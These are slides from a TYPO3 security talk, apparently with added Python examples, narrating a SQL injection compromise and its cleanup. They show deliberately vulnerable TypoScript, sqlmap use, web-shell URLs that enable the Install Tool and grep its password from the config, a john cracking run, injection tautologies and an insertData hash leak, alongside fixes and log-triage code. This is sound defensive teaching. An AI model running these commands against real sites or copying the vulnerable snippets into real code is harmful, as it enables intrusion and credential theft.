Secure TYPO3 - Diary of a Hack


Inspiring people to share

#CertiFUNcation - Brühl 2015

Secure TYPO3

CertiFUNcation - Brühl 2015

Helmut Hummel <[email protected]>

05.06.2015


Agenda

• Diary of a Hack

• Further Pitfalls

• Best Practice

Diary of a Hack


Day 1 - Implementing a feature

lib.sqliSimple = CONTENT
lib.sqliSimple {
  table = tt_content
  select.where.wrap = colPos=|
  select.where.data = GP:colPos
}

lib.sqliSearch = CONTENT
lib.sqliSearch {
  table = tt_content
  select.where.wrap = header like '%|%'
  select.where.data = GP:search
}

Day 2 - Testing the feature

'BE/debug' => '1'
'FE/debug' => '1'
'SYS/devIPmask' => '*'
'SYS/displayErrors' => '1'
'SYS/sqlDebug' => '1'
'SYS/exceptionalErrors' => '28674'

'DB/username' => 'root'


Day 3 - Distraction


Day 4 - Attraction


https://www.google.de/?q=exec_SELECTquery+%22You+have+an+error+in+your+SQL+syntax%22


Day 5 - Exploitation

$ sqlmap -u 'http://security.dev/insecurity/?colPos=0' -p 'colPos'

GET parameter 'colPos' is vulnerable. Do you want to keep testing the others? [y/N]
sqlmap identified the following injection points with a total of 30 HTTP(s) requests:

http://security.dev/tmpbrsru.php?cmd=touch%20typo3conf/ENABLE_INSTALL_TOOL

http://security.dev/typo3/sysext/install/Start/Install.php

http://security.dev/tmpbrsru.php?cmd=grep%20installToolPassword%20typo3conf/LocalConfiguration.php

$ john pw
Loaded 1 password hash (phpass MD5 [128/128 SSE2 intrinsics 4x4x5])
password         (dummy)
guesses: 1  time: 0:00:00:01 DONE (Thu Jun 4 11:00:44 2015)  c/s: 900  trying: 123456 - fishing


Day 5 - Discovery


Discovery

• Take site offline!

• seriously

• I mean it


Day 6 - Analysis


Analysis

• Make a backup of current state (files, DB)

• Search all logs for „suspicious“ entries

• Try to reproduce assumed entry points

• If in doubt: get help
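The "search all logs for suspicious entries" step, as an added example that is not part of the talk: a small Python scanner run over constructed Apache access-log lines. The request paths in the sample echo the artefacts the talk shows (sqlmap probing the colPos parameter, a dropped PHP file taking a cmd parameter, the Install Tool being enabled); the log lines themselves, the rule set and the reason tags are this example's own choices and assumptions.

```python
import re
from dataclasses import dataclass
from urllib.parse import parse_qs, unquote_plus

# Constructed Apache "combined" log lines for the demo; not taken from any real server.
SAMPLE_LOG = """\
10.0.0.5 - - [04/Jun/2015:10:55:01 +0200] "GET /insecurity/?colPos=0 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [04/Jun/2015:10:58:12 +0200] "GET /insecurity/?colPos=0%20AND%201%3D1 HTTP/1.1" 200 5120 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
10.0.0.9 - - [04/Jun/2015:10:58:13 +0200] "GET /insecurity/?colPos=0%27 HTTP/1.1" 500 812 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
10.0.0.9 - - [04/Jun/2015:11:00:02 +0200] "GET /tmpbrsru.php?cmd=touch%20typo3conf/ENABLE_INSTALL_TOOL HTTP/1.1" 200 12 "-" "Mozilla/5.0"
10.0.0.9 - - [04/Jun/2015:11:00:20 +0200] "GET /typo3/sysext/install/Start/Install.php HTTP/1.1" 200 9031 "-" "Mozilla/5.0"
10.0.0.7 - - [04/Jun/2015:11:05:44 +0200] "GET /index.php?id=12 HTTP/1.1" 200 7742 "-" "Mozilla/5.0"
"""

# Apache combined log format: ip ident user [time] "method target proto" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Crude probe signatures: a stray quote, a boolean tautology, or a UNION SELECT in a query string.
SQLI_PROBE_RE = re.compile(r"""(?i)(['"]|\b(?:and|or)\b\s*\d+\s*=\s*\d+|\bunion\s+select\b)""")


@dataclass
class Finding:
    line_no: int
    ip: str
    target: str
    reasons: list


def classify(target, status, ua):
    """Return the list of rule tags a request trips (empty list = nothing suspicious)."""
    reasons = []
    path, _, query = target.partition("?")
    decoded_query = unquote_plus(query)
    if "sqlmap" in ua.lower():
        reasons.append("scanner-user-agent")          # sqlmap's default user-agent
    if query and SQLI_PROBE_RE.search(decoded_query):
        reasons.append("sqli-probe")
    if query and status.startswith("5"):
        reasons.append("server-error-on-parameter")   # the "error in your SQL syntax" symptom
    if "/sysext/install/" in path or "ENABLE_INSTALL_TOOL" in decoded_query:
        reasons.append("install-tool")                # Install Tool touched or enabled
    if path.endswith(".php") and "cmd" in parse_qs(query):
        reasons.append("command-parameter")           # PHP file driven by a cmd= parameter
    return reasons


def scan(log_text):
    """Parse every line; keep those that trip at least one rule, in file order."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not in combined format; a real triage would count these separately
        reasons = classify(m["target"], m["status"], m["ua"])
        if reasons:
            findings.append(Finding(line_no, m["ip"], m["target"], reasons))
    return findings


def suspect_ips(findings):
    """Distinct source addresses behind the findings, for pivoting through the rest of the log."""
    return sorted({f.ip for f in findings})


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.ip} {f.target} -> {', '.join(f.reasons)}")
    print("pivot on:", suspect_ips(scan(SAMPLE_LOG)))
```

The rules are deliberately narrow; the point of `suspect_ips` is the pivot: once an address is flagged, every other request from it, including the ones that matched no rule, belongs in the timeline, because that is where the first contact and the later clean-up attempts usually hide.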


Day 7 - Fix

lib.sqliSimple = CONTENT
lib.sqliSimple {
  table = tt_content
  select.where = colPos=###colPos###
  select.markers {
    colPos.data = GP:colPos
  }
}

lib.sqliSearch = CONTENT
lib.sqliSearch {
  table = tt_content
  select.where = header like ###search###
  select.markers {
    search.data = GP:search
    search.wrap = %|%
  }
}
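The two Day 1 snippets and their Day 7 fixes side by side, as an added example that is not part of the talk: plain Python against an in-memory SQLite table that stands in for tt_content. The "wrap" variants splice the request value into SQL text, exactly as `select.where.wrap` + `select.where.data` do; the "marker" variants bind it as a parameter, which is what `select.markers` achieves by quoting the value before it is substituted for `###colPos###` / `###search###`. Table contents and the sqlite3 stand-in are this example's assumptions.

```python
import sqlite3

# Constructed sample rows standing in for TYPO3's tt_content table (not real site data).
SAMPLE_ROWS = [
    (1, 0, "Welcome"),
    (2, 0, "News"),
    (3, 1, "Sidebar teaser"),
    (4, 2, "Footer"),
]


def make_db():
    """In-memory SQLite stand-in for the TYPO3 database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tt_content (uid INTEGER PRIMARY KEY, colPos INTEGER, header TEXT)")
    conn.executemany("INSERT INTO tt_content VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def uids(conn, sql, params=()):
    return [row[0] for row in conn.execute(sql, params)]


# --- Day 1: the request parameter becomes part of the SQL text -------------------

def vulnerable_colpos(conn, col_pos):
    """Mirrors `select.where.wrap = colPos=|` + `select.where.data = GP:colPos`:
    the GET value is spliced into the WHERE clause verbatim."""
    return uids(conn, "SELECT uid FROM tt_content WHERE colPos=" + col_pos + " ORDER BY uid")


def vulnerable_search(conn, search):
    """Mirrors `select.where.wrap = header like '%|%'` + `select.where.data = GP:search`."""
    return uids(conn, "SELECT uid FROM tt_content WHERE header like '%" + search + "%' ORDER BY uid")


# --- Day 7: the value travels as a bound parameter, as the ###markers### do ------

def fixed_colpos(conn, col_pos):
    """Mirrors `select.where = colPos=###colPos###` + `select.markers.colPos.data = GP:colPos`:
    whatever the client sends is compared as a value, never parsed as SQL."""
    return uids(conn, "SELECT uid FROM tt_content WHERE colPos=? ORDER BY uid", (col_pos,))


def fixed_search(conn, search):
    """Mirrors `select.where = header like ###search###` + `search.wrap = %|%`:
    the wildcard wrap is applied to the value, then the whole thing is bound as one string."""
    return uids(conn, "SELECT uid FROM tt_content WHERE header like ? ORDER BY uid", ("%" + search + "%",))


if __name__ == "__main__":
    db = make_db()
    for fn in (vulnerable_colpos, fixed_colpos):
        print(fn.__name__, fn(db, "0"), fn(db, "0 OR 1=1"))
    for fn in (vulnerable_search, fixed_search):
        print(fn.__name__, fn(db, "side"), fn(db, "' OR '1'='1"))
```

Running it shows the scope change: the tautology widens the vulnerable queries to every row, while the bound variants compare the same input as a literal and match nothing. One caveat the markers do not cover: in `fixed_search` the client can still send `%` or `_` and get LIKE wildcards, so a search field that must not enumerate the table needs the wildcards escaped as well.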

Fix

• Close the security issue in Code / Extension / Core

• Restore from backup

• Or, if you really know what you are doing: clean up the installation

• Go online again

• Plan improvements (education, monitoring, …)


Further Pitfalls


Types of Security Threats

• Information disclosure

• SQL injection

• Cross Site Scripting (XSS)

• http://docs.typo3.org/typo3cms/SecurityGuide/TypesOfThreats/Index.html

• https://www.owasp.org/index.php/Category:Attack


TypoScript

page.10 = TEXT
page.10.field = title
page.10.wrap = <h1 class="c-{field:layout}">|</h1>
page.10.insertData = 1

page.10 = TEXT
# title can contain: {DB:be_users:1:password}
page.10.field = title
page.10.wrap = <h1 class="c-{field:layout}">|</h1>
page.10.insertData = 1

page.10 = TEXT
page.10.field = title
page.10.dataWrap = <h1 class="c-{field:layout}">|</h1>

page.10 = TEXT
# title can contain HTML
page.10.field = title
page.10.dataWrap = <h1 class="c-{field:layout}">|</h1>

page.10 = TEXT
page.10.field = title
page.10.dataWrap = <h1 class="c-{field:layout}">|</h1>
page.10.htmlSpecialChars = 1

page.10 = TEXT
# Avoid dataWrap or insertData if possible
# layout field might not be safe
page.10.field = title
page.10.dataWrap = <h1 class="c-{field:layout}">|</h1>
page.10.htmlSpecialChars = 1
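Why the four TypoScript variants above behave so differently, as an added Python model that is not part of the talk: a deliberately small stand-in for a TEXT cObject that applies `htmlSpecialChars`, `wrap`, `dataWrap` and `insertData` in the order TYPO3's stdWrap evaluates them (an assumption of this model; the real stdWrap has many more properties and a full getData), with `getData` reduced to the two paths the slides use, `field:` and `DB:`. The page record, the be_users row and its placeholder hash are constructed.

```python
import html
import re

# Constructed records standing in for TYPO3 tables; the hash is a placeholder, not a real one.
DB = {
    "be_users": {1: {"username": "admin", "password": "$P$constructed-placeholder-hash"}},
}

MARKER_RE = re.compile(r"\{([^{}]+)\}")


def get_data(path, record):
    """Minimal stand-in for TYPO3's getData(): only `field:<name>` and `DB:<table>:<uid>:<field>`."""
    parts = path.split(":")
    if parts[0] == "field" and len(parts) == 2:
        return str(record.get(parts[1], ""))
    if parts[0] == "DB" and len(parts) == 4:
        return str(DB.get(parts[1], {}).get(int(parts[2]), {}).get(parts[3], ""))
    return ""


def insert_data(text, record):
    """Resolve every {...} marker in `text`; this is what insertData and dataWrap do."""
    return MARKER_RE.sub(lambda m: get_data(m.group(1), record), text)


def render_text(record, field, wrap="", dataWrap="", insertData=False, htmlSpecialChars=False):
    """Model of a TEXT object with four stdWrap properties, in TYPO3's evaluation order
    (htmlSpecialChars, wrap, dataWrap, insertData); assumed and simplified for illustration."""
    content = str(record.get(field, ""))
    if htmlSpecialChars:
        content = html.escape(content)                 # escapes the field value only
    if wrap:
        content = wrap.replace("|", content, 1)        # no marker resolution at all
    if dataWrap:
        content = insert_data(dataWrap, record).replace("|", content, 1)  # markers in the wrap only
    if insertData:
        content = insert_data(content, record)         # markers anywhere, field value included
    return content


WRAP = '<h1 class="c-{field:layout}">|</h1>'

# An editor writes marker syntax into the page title (the "title can contain:" slide).
LEAKY_PAGE = {"title": "About us {DB:be_users:1:password}", "layout": "1"}
# An editor writes HTML into the title and a quote into the layout field.
HTML_PAGE = {"title": "<b>About us</b>", "layout": '1"'}


def leak_via_insert_data():
    """wrap + insertData = 1: the marker inside the title is resolved, the hash is rendered."""
    return render_text(LEAKY_PAGE, "title", wrap=WRAP, insertData=True)


def data_wrap_keeps_markers_literal():
    """dataWrap alone: only the wrap string sees getData; the title's marker stays text."""
    return render_text(LEAKY_PAGE, "title", dataWrap=WRAP)


def data_wrap_unescaped():
    """dataWrap without htmlSpecialChars: the title's HTML goes out as-is."""
    return render_text(HTML_PAGE, "title", dataWrap=WRAP)


def data_wrap_escaped():
    """dataWrap + htmlSpecialChars = 1: the title is escaped, the layout value in the wrap is not."""
    return render_text(HTML_PAGE, "title", dataWrap=WRAP, htmlSpecialChars=True)


if __name__ == "__main__":
    for fn in (leak_via_insert_data, data_wrap_keeps_markers_literal, data_wrap_unescaped, data_wrap_escaped):
        print(f"{fn.__name__:34} {fn()}")
```

The last case is the one the final slide's comment is about: `htmlSpecialChars` only ever touches the field value, so the `{field:layout}` that `dataWrap` pulls in arrives unescaped inside the attribute, which is why the safest option is to not use `dataWrap`/`insertData` for anything editors can influence.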


Fluid


Extbase

XSS even when using Fluid

• Flash Messages

• HTML Context

• Custom View Helpers


Best Practice


Best Practice

• Defined Process

• Regular updates

• Backups

• Monitoring

• Education

• Reserve time for all of the above

• More in: http://docs.typo3.org/typo3cms/SecurityGuide/

Questions?


Resources

• http://sqlmap.org

• http://www.openwall.com/john/

• http://docs.typo3.org/typo3cms/SecurityGuide/

• https://www.owasp.org/

Thank you! @helhum

http://insight.helhum.io [email protected]